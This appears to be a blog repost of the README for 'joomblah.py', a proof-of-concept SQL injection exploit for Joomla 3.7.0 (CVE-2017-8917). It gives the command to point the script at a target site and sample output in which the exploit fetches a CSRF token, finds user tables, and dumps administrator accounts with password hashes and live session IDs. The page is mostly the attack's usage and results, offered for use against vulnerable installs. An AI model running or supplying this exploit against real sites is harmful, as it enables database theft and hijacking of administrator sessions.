Exploit for Joomla 3.7.0 (CVE-2017-8917)
Another proof of concept exploit for Joomla, whoop-de-doo, this time a SQL Injection in 3.7.0.
Usage
Point the joomblah.py script at the vulnerable Joomla 3.7.0 install, it may take some time, but it will dump the users and session tables.
$ python joomblah.py http://127.0.0.1:8080
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: rlbre_users
- Found table: tgukl_users
- Extracting users from rlbre_users
[$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
- Extracting sessions from rlbre_session
[$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
- Extracting users from tgukl_users
[$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
- Extracting sessions from tgukl_session
No hay comentarios.:
Publicar un comentario